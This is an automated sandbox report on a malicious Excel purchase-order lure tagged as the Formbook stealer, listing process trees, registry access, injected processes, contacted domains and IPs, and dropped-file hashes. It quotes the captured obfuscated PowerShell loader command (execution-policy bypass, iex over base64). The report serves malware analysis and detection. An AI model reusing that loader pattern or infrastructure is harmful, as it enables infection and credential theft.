Malware Analysis Report

2025-01-18 12:24

Sample ID 240829-m3lv1axfpd
Target PO-014842-2.xls
SHA256 b171b5e7c7abd247edcc25f1c00301e89f1e9715ed6d98f03f4b6a6674c5834b
Tags
formbook b48n defense_evasion discovery execution rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

b171b5e7c7abd247edcc25f1c00301e89f1e9715ed6d98f03f4b6a6674c5834b

Threat Level: Known bad

The file PO-014842-2.xls was found to be: Known bad.

Malicious Activity Summary

formbook b48n defense_evasion discovery execution rat spyware stealer trojan

Process spawned unexpected child process

Formbook

Formbook payload

Downloads MZ/PE file

Blocklisted process makes network request

Evasion via Device Credential Deployment

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Uses Volume Shadow Copy WMI provider

Suspicious behavior: AddClipboardFormatListener

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Uses Volume Shadow Copy service COM API

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-29 10:59

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-29 10:59

Reported

2024-08-29 11:02

Platform

win7-20240704-en

Max time kernel

149s

Max time network

147s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

Formbook payload

rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 672 set thread context of 2940 | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 2940 set thread context of 1208 | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Windows\Explorer.EXE
PID 2940 set thread context of 1208 | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Windows\Explorer.EXE
PID 1532 set thread context of 1208 | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | C:\Windows\Explorer.EXE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3450744190-3404161390-554719085-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2764 wrote to memory of 2164 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2764 wrote to memory of 2164 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2764 wrote to memory of 2164 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2764 wrote to memory of 2164 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2164 wrote to memory of 2208 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 2208 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 2208 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2164 wrote to memory of 2208 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2208 wrote to memory of 592 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2208 wrote to memory of 592 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2208 wrote to memory of 592 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2208 wrote to memory of 592 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 592 wrote to memory of 1308 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 592 wrote to memory of 1308 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 592 wrote to memory of 1308 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 592 wrote to memory of 1308 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2208 wrote to memory of 672 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 2208 wrote to memory of 672 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 2208 wrote to memory of 672 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 2208 wrote to memory of 672 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 672 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 672 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 672 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 672 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 672 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 672 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 672 wrote to memory of 2940 | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 2940 wrote to memory of 1532 | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Windows\SysWOW64\NAPSTAT.EXE
PID 2940 wrote to memory of 1532 | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Windows\SysWOW64\NAPSTAT.EXE
PID 2940 wrote to memory of 1532 | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Windows\SysWOW64\NAPSTAT.EXE
PID 2940 wrote to memory of 1532 | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Windows\SysWOW64\NAPSTAT.EXE
PID 1532 wrote to memory of 404 | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 404 | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 404 | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | C:\Windows\SysWOW64\cmd.exe
PID 1532 wrote to memory of 404 | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO-014842-2.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/C powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'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'+[chaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'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'+[chaR]0X22+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xcuhhq5p.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8670.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC866F.tmp"

C:\Users\Admin\AppData\Roaming\MeMpEng.exe

"C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

C:\Users\Admin\AppData\Roaming\MeMpEng.exe

"C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

C:\Windows\SysWOW64\NAPSTAT.EXE

"C:\Windows\SysWOW64\NAPSTAT.EXE"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | zhort.de | udp
DE | 88.99.66.38:443 | zhort.de | tcp
US | 8.8.8.8:53 | e6.o.lencr.org | udp
GB | 88.221.134.89:80 | e6.o.lencr.org | tcp
NL | 45.89.247.151:80 | 45.89.247.151 | tcp
DE | 88.99.66.38:443 | zhort.de | tcp
NL | 45.89.247.151:80 | 45.89.247.151 | tcp
NL | 45.89.247.151:80 | 45.89.247.151 | tcp
US | 8.8.8.8:53 | crl.microsoft.com | udp
GB | 2.19.252.143:80 | crl.microsoft.com | tcp
US | 8.8.8.8:53 | www.ommybahamabigsales.shop | udp
US | 8.8.8.8:53 | www.laywithkemon.rest | udp
US | 8.8.8.8:53 | www.igfloppafan.club | udp

Files

memory/2092-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2092-1-0x0000000071D1D000-0x0000000071D28000-memory.dmp

memory/2764-18-0x0000000002880000-0x0000000002882000-memory.dmp

memory/2092-19-0x0000000002470000-0x0000000002472000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7E8BDF27898FD04B591B0B0011B10808

MD5 11aef50d0ddb441b81b4eb386f1c0626
SHA1 87eae333024929541102871faf79058cb4d9c05d
SHA256 a1c91d4d65468f77357db9407080170e53816ed8147ab17939f4d9a4069c0a2a
SHA512 307c5b5276230243de02f29e233c3103c7643988c5a10bdfbe3c8c10dec71dd725b7fdec4fbe11d8c478183f3a127e7e2d673f0898cb61608730c9af62739402

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7E8BDF27898FD04B591B0B0011B10808

MD5 2a22d79f810194591562f5550fd2fdaf
SHA1 9085f1492a5bcc3f539169ebd82cbe8ead4f4eec
SHA256 d0321588aa29241312e1508e1013faabd7a815767235104fbe3a6b9b5600d9f1
SHA512 281e6f5ad830fb2cc0c08618a13b14b9e82a944ab2efb32999d2f9a89ae3be6854f9cf60de2910f3866a14deda74719d8676de82932ea3fdd581ecc75092b579

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 97ff20422f18364ef32dac00a6948fa5
SHA1 ad51613b5210699124bdbbbae46bdd112ec7fef7
SHA256 ea3e5abb29f478dad26f6365e6f2809a650bbdf2aeec0fe8fa97f9f39c476456
SHA512 8917c820e12075899419c6f3211cffed742e1bbc5d0d966b65699009b473b0168a3007854292aea65ae54edfcffc5174c5e23cb7b0fbaf9184d399eed5c24d55

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9cebf576441ef09353a6f4393089269a
SHA1 170c63f07f3442e8ff7a56f76fef8fc6c79dd8e5
SHA256 06247569f3b1d693386143b0784e19c912589bd0fafd1b466c35e3acdd204af8
SHA512 01c3f28b69ebf9566e109501c78bb0a568d82928bbd3b4bd1e54384147d8b48f3eef6b61e38706c06708d4374469a128c27625033c2f0bdeae456f35e05de3ae

C:\Users\Admin\AppData\Local\Temp\Cab80B4.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2LF9I1AK\IEnetworthUpdated[1].hta

MD5 87635cf66104074c53e698677de6002b
SHA1 958ba282403c968f0dc8631aa396b8a73612ffe3
SHA256 4768f32e03962166a83fab45ea2e5865291e66bff359c547573ca34da6fe78cf
SHA512 7976b9820a1494953d6b99982e696a9faed599bc8ec932e92285ab10eb5db8d6ff76794309d062c8e8410e1142d06f75a70c417ea646e0adb5b42a2c55a3e31d

\??\c:\Users\Admin\AppData\Local\Temp\xcuhhq5p.cmdline

MD5 7009a4514cb2d037ed2d86e6b418b9eb
SHA1 ecf737444cbb5dfec1ad98b201a36e8d53a39886
SHA256 0437894fbc507f5dc968a935fc9688f60b0df53acb627201c3dfc5521c5abfac
SHA512 8ca52ab3425682df24a46fd3a61568bf40e71bd9dd6c6abedd78657ee4944c97e87e9185203f8da44dac608115ab7694c7abc7606ceadb92f2c0d9fea00d931e

\??\c:\Users\Admin\AppData\Local\Temp\xcuhhq5p.0.cs

MD5 f2a64cd1f09c060d9412d84239f92021
SHA1 8053849b3e79d63181b74207b19e76775a248982
SHA256 2f6ec9f074eca2e37185fbec988ed8bd98be664feeec718f77cc489413ddd1d7
SHA512 f7661e45c4752e6457741d1bd753e25e1b624fd0c85062b74c0a8d0334c4b7a7fb4ef58295b31607ad427b08d8b87b730025b33fbd3b60041af83e29dbb95513

\??\c:\Users\Admin\AppData\Local\Temp\CSC866F.tmp

MD5 4383f351ce2a28e7fd56b3404e4843c3
SHA1 06295ec0aed990803a7638f2142d61acd43e4d07
SHA256 80d79dc2d210bf21c48239930e2f69d288cecbabf5d13fdc8993c8bc221f5e9f
SHA512 d7aaf9dfd21339a1843aae99a126a62d209c221ad13c9b115365974f88d19f6abac4d0722f4be42792b2d8a0b19058c58262aec0df1e58502ff84d04c5d8f0bb

C:\Users\Admin\AppData\Local\Temp\RES8670.tmp

MD5 bb2cd7c30c721194edf8a5f7fb4eed54
SHA1 465e4744f690afe7e3aa172d3ed8b8eb9ab6dd8d
SHA256 8993b586338e213234b2b95a1a55921b495ff70f7bc23eacb152f5071ed34318
SHA512 b2051c01856641649bbc9341791461f955d1434b8eeb0eb798bb95a7bf6d3f46ba8d2160e63e1bd37d075e742969555cb13ba1e1753bd330982bae61ac997535

C:\Users\Admin\AppData\Local\Temp\xcuhhq5p.dll

MD5 ef62d9579bb4be32fcb68056a4094a89
SHA1 c0e72e5333eab292d3382f659f8e415681df8c93
SHA256 43ce75b0ecf589cd403d39d5100bd1b2934e11c173578e6960a606e6ae6cde68
SHA512 fc55b7a33921e20c8027cb522f45a9921573fb66654ff5039a91fab3e44be370fe30850cfa78a455f78b36f528c43531f8934b9c07032ba2d657178a88d288bc

C:\Users\Admin\AppData\Local\Temp\xcuhhq5p.pdb

MD5 972195f7e5de81650fe13e91c7422d22
SHA1 1dbc2ab6ca93f16eb8ae28b2db697bdfd8dd1c83
SHA256 904ccc8912bf6bd7ab70cb92ba49057cb0217142d44e1e54c18f0bf6c35449da
SHA512 3cf33b724babd55f736e06db4a08ecf5554610efe88ba8bf84eed0529bcfdb23ea0039254139bdb47051a24ac10a9f8846a69d043f647b38cc8362c1bc09d38c

C:\Users\Admin\AppData\Roaming\MeMpEng.exe

MD5 dd2e0becfb1316c49975386fc3367c45
SHA1 98c578ff997ef781919ca5967251fa9d462a756e
SHA256 14d4d6df33e96af2a1d5ef8f8e7f6f1b914b0342b219c75f812848f52bc27628
SHA512 4768fa7aa32dc02e958c8506880311bb0d4fa5a9cd9fcdc6581a8349b1d85b3323513d28018b55ffbdb79e440e4b371dfb260cbd097ffd2279993b9a1a416bfb

memory/672-64-0x0000000001290000-0x000000000132C000-memory.dmp

memory/672-65-0x0000000000A10000-0x0000000000A28000-memory.dmp

memory/2092-66-0x0000000071D1D000-0x0000000071D28000-memory.dmp

memory/672-67-0x0000000005BB0000-0x0000000005C26000-memory.dmp

memory/2940-68-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2940-70-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2940-73-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2940-72-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1208-76-0x0000000003B30000-0x0000000003C30000-memory.dmp

memory/2940-77-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1208-78-0x0000000006590000-0x00000000066E8000-memory.dmp

memory/1532-79-0x00000000008E0000-0x0000000000926000-memory.dmp

memory/1532-80-0x00000000000D0000-0x00000000000FF000-memory.dmp

memory/2092-88-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2092-91-0x0000000071D1D000-0x0000000071D28000-memory.dmp

memory/1208-93-0x00000000070B0000-0x0000000007225000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-29 10:59

Reported

2024-08-29 11:02

Platform

win10v2004-20240802-en

Max time kernel

144s

Max time network

131s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-014842-2.xls"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1408 wrote to memory of 4736 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe
PID 1408 wrote to memory of 4736 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\PO-014842-2.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4336,i,8293235976513689021,7261015831736501466,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:8

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp
US | 8.8.8.8:53 | roaming.officeapps.live.com | udp
US | 8.8.8.8:53 | zhort.de | udp
DE | 88.99.66.38:443 | zhort.de | tcp
IE | 52.109.76.243:443 | roaming.officeapps.live.com | tcp
US | 8.8.8.8:53 | 46.28.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | e6.o.lencr.org | udp
GB | 88.221.134.89:80 | e6.o.lencr.org | tcp
NL | 45.89.247.151:80 | 45.89.247.151 | tcp
US | 8.8.8.8:53 | 38.66.99.88.in-addr.arpa | udp
US | 8.8.8.8:53 | 243.76.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 168.245.100.95.in-addr.arpa | udp
US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 89.134.221.88.in-addr.arpa | udp
US | 8.8.8.8:53 | 151.247.89.45.in-addr.arpa | udp
US | 8.8.8.8:53 | g.bing.com | udp
US | 150.171.27.10:443 | g.bing.com | tcp
US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp
